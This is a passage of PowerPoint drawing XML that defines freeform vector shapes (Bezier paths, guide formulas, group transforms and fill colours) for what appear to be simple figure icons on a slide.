                  <a:gd name="T70" fmla="*/ 119 w 159"/>
                  <a:gd name="T71" fmla="*/ 87 h 189"/>
                  <a:gd name="T72" fmla="*/ 119 w 159"/>
                  <a:gd name="T73" fmla="*/ 82 h 189"/>
                  <a:gd name="T74" fmla="*/ 119 w 159"/>
                  <a:gd name="T75" fmla="*/ 80 h 189"/>
                  <a:gd name="T76" fmla="*/ 118 w 159"/>
                  <a:gd name="T77" fmla="*/ 77 h 189"/>
                  <a:gd name="T78" fmla="*/ 119 w 159"/>
                  <a:gd name="T79" fmla="*/ 87 h 189"/>
                  <a:gd name="T80" fmla="*/ 123 w 159"/>
                  <a:gd name="T81" fmla="*/ 111 h 189"/>
                  <a:gd name="T82" fmla="*/ 159 w 159"/>
                  <a:gd name="T83" fmla="*/ 105 h 189"/>
                  <a:gd name="T84" fmla="*/ 150 w 159"/>
                  <a:gd name="T85" fmla="*/ 48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59" h="189">
                    <a:moveTo>
                      <a:pt x="150" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="31"/>
                      <a:pt x="132" y="26"/>
                      <a:pt x="124" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="23"/>
                      <a:pt x="124" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="122" y="23"/>
                      <a:pt x="122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0" y="22"/>
                      <a:pt x="118" y="21"/>
                      <a:pt x="116" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="21"/>
                      <a:pt x="116" y="21"/>
                      <a:pt x="116" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="20"/>
                      <a:pt x="114" y="20"/>
                      <a:pt x="114" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="20"/>
                      <a:pt x="113" y="20"/>
                      <a:pt x="113" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="20"/>
                      <a:pt x="112" y="19"/>
                      <a:pt x="111" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="19"/>
                      <a:pt x="110" y="19"/>
                      <a:pt x="109" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="19"/>
                      <a:pt x="109" y="19"/>
                      <a:pt x="108" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="18"/>
                      <a:pt x="107" y="18"/>
                      <a:pt x="106" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="69" y="71"/>
                      <a:pt x="69" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="82"/>
                      <a:pt x="68" y="180"/>
                      <a:pt x="68" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="71"/>
                      <a:pt x="69" y="71"/>
                      <a:pt x="69" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="69"/>
                      <a:pt x="68" y="66"/>
                      <a:pt x="67" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="47"/>
                      <a:pt x="53" y="22"/>
                      <a:pt x="52" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="14"/>
                      <a:pt x="52" y="13"/>
                      <a:pt x="52" y="13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2" y="6"/>
                      <a:pt x="59" y="5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46" y="1"/>
                      <a:pt x="47" y="2"/>
                      <a:pt x="41" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="1"/>
                      <a:pt x="41" y="1"/>
                      <a:pt x="40" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="0"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="13"/>
                      <a:pt x="6" y="41"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="80"/>
                      <a:pt x="25" y="82"/>
                      <a:pt x="30" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="68"/>
                      <a:pt x="34" y="56"/>
                      <a:pt x="35" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="88"/>
                      <a:pt x="34" y="136"/>
                      <a:pt x="34" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="168"/>
                      <a:pt x="37" y="173"/>
                      <a:pt x="44" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="176"/>
                      <a:pt x="87" y="186"/>
                      <a:pt x="94" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="189"/>
                      <a:pt x="118" y="180"/>
                      <a:pt x="121" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="149"/>
                      <a:pt x="121" y="129"/>
                      <a:pt x="121" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="103"/>
                      <a:pt x="120" y="94"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="85"/>
                      <a:pt x="119" y="83"/>
                      <a:pt x="119" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="81"/>
                      <a:pt x="119" y="81"/>
                      <a:pt x="119" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="79"/>
                      <a:pt x="118" y="78"/>
                      <a:pt x="118" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="80"/>
                      <a:pt x="119" y="83"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="93"/>
                      <a:pt x="122" y="102"/>
                      <a:pt x="123" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="112"/>
                      <a:pt x="145" y="111"/>
                      <a:pt x="159" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="79"/>
                      <a:pt x="151" y="55"/>
                      <a:pt x="150" y="48"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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89" name="Freeform 498">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E457B5B-D536-4052-BE79-A981831C2B0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90" y="-2518"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 80"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="1" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="63"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38" y="1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90" name="Freeform 499">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E09132-AAE6-45A2-B0DD-5966538EAF1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90" y="-2518"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 80"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="1" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="63"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38" y="1"/>
                    </a:cubicBezTo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91" name="Freeform 500">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6972F902-7E45-4C62-BF04-D1A6DC51682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97" y="-2407"/>
                <a:ext cx="93" cy="78"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 39"/>
                  <a:gd name="T1" fmla="*/ 14 h 33"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 7 h 33"/>
                  <a:gd name="T4" fmla="*/ 20 w 39"/>
                  <a:gd name="T5" fmla="*/ 29 h 33"/>
                  <a:gd name="T6" fmla="*/ 36 w 39"/>
                  <a:gd name="T7" fmla="*/ 1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33">
                    <a:moveTo>
                      <a:pt x="36" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="14"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="14"/>
                      <a:pt x="11" y="25"/>
                      <a:pt x="20" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="33"/>
                      <a:pt x="39" y="32"/>
                      <a:pt x="36" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="9AC1D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92" name="Freeform 501">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A69A0E0-4DEB-47EF-A88E-E4E4B649E1B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783" y="-2429"/>
                <a:ext cx="94" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 94 w 94"/>
                  <a:gd name="T1" fmla="*/ 0 h 55"/>
                  <a:gd name="T2" fmla="*/ 0 w 94"/>
                  <a:gd name="T3" fmla="*/ 55 h 55"/>
                  <a:gd name="T4" fmla="*/ 94 w 94"/>
                  <a:gd name="T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4" h="55">
                    <a:moveTo>
                      <a:pt x="94" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="55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93" name="Line 502">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF45691D-2741-4CC0-81D4-0164DD50A00F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 flipH="1">
                <a:off x="783" y="-2429"/>
                <a:ext cx="94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94" name="Freeform 503">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADEDA52-1411-49FB-99D0-CB7C85161AC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95" y="-2537"/>
                <a:ext cx="234" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 99"/>
                  <a:gd name="T1" fmla="*/ 8 h 69"/>
                  <a:gd name="T2" fmla="*/ 0 w 99"/>
                  <a:gd name="T3" fmla="*/ 39 h 69"/>
                  <a:gd name="T4" fmla="*/ 50 w 99"/>
                  <a:gd name="T5" fmla="*/ 54 h 69"/>
                  <a:gd name="T6" fmla="*/ 72 w 99"/>
                  <a:gd name="T7" fmla="*/ 69 h 69"/>
                  <a:gd name="T8" fmla="*/ 19 w 99"/>
                  <a:gd name="T9" fmla="*/ 8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9" h="69">
                    <a:moveTo>
                      <a:pt x="19" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="10"/>
                      <a:pt x="2" y="26"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39"/>
                      <a:pt x="19" y="49"/>
                      <a:pt x="50" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="55"/>
                      <a:pt x="64" y="68"/>
                      <a:pt x="72" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="16"/>
                      <a:pt x="44" y="0"/>
                      <a:pt x="19" y="8"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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731" name="Group 1177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C802DB5-B539-4010-ACF5-61A43E7F1E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94878" y="1805143"/>
              <a:ext cx="734069" cy="425414"/>
              <a:chOff x="1585" y="2181"/>
              <a:chExt cx="635" cy="368"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1745" name="Group 913">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{876F030B-509F-4A19-BA59-1F1E9C62CF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850" y="2181"/>
                <a:ext cx="133" cy="318"/>
                <a:chOff x="3735" y="3265"/>
                <a:chExt cx="468" cy="1120"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1766" name="Freeform 914">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5176027-17A0-4510-95E6-C8CC17F2FAF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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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67" name="Freeform 915">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD2D137-78C6-421E-98EE-691E50CE05B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53" y="3806"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 90"/>
                    <a:gd name="T1" fmla="*/ 20 h 245"/>
                    <a:gd name="T2" fmla="*/ 12 w 90"/>
                    <a:gd name="T3" fmla="*/ 10 h 245"/>
                    <a:gd name="T4" fmla="*/ 3 w 90"/>
                    <a:gd name="T5" fmla="*/ 0 h 245"/>
                    <a:gd name="T6" fmla="*/ 3 w 90"/>
                    <a:gd name="T7" fmla="*/ 36 h 245"/>
                    <a:gd name="T8" fmla="*/ 2 w 90"/>
                    <a:gd name="T9" fmla="*/ 205 h 245"/>
                    <a:gd name="T10" fmla="*/ 44 w 90"/>
                    <a:gd name="T11" fmla="*/ 204 h 245"/>
                    <a:gd name="T12" fmla="*/ 44 w 90"/>
                    <a:gd name="T13" fmla="*/ 211 h 245"/>
                    <a:gd name="T14" fmla="*/ 88 w 90"/>
                    <a:gd name="T15" fmla="*/ 218 h 245"/>
                    <a:gd name="T16" fmla="*/ 89 w 90"/>
                    <a:gd name="T17" fmla="*/ 156 h 245"/>
                    <a:gd name="T18" fmla="*/ 90 w 90"/>
                    <a:gd name="T19" fmla="*/ 7 h 245"/>
                    <a:gd name="T20" fmla="*/ 89 w 90"/>
                    <a:gd name="T21" fmla="*/ 5 h 245"/>
                    <a:gd name="T22" fmla="*/ 89 w 90"/>
                    <a:gd name="T23" fmla="*/ 5 h 245"/>
                    <a:gd name="T24" fmla="*/ 63 w 90"/>
                    <a:gd name="T25" fmla="*/ 20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0" h="245">
                      <a:moveTo>
                        <a:pt x="63" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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9" y="5"/>
                        <a:pt x="89" y="5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68" name="Freeform 916">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2156B80B-3EEB-4357-B30C-F772E590075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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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69" name="Freeform 917">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305ED0AD-2751-4A8C-A2AD-BF099695D3A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735" y="3419"/>
                  <a:ext cx="468" cy="545"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
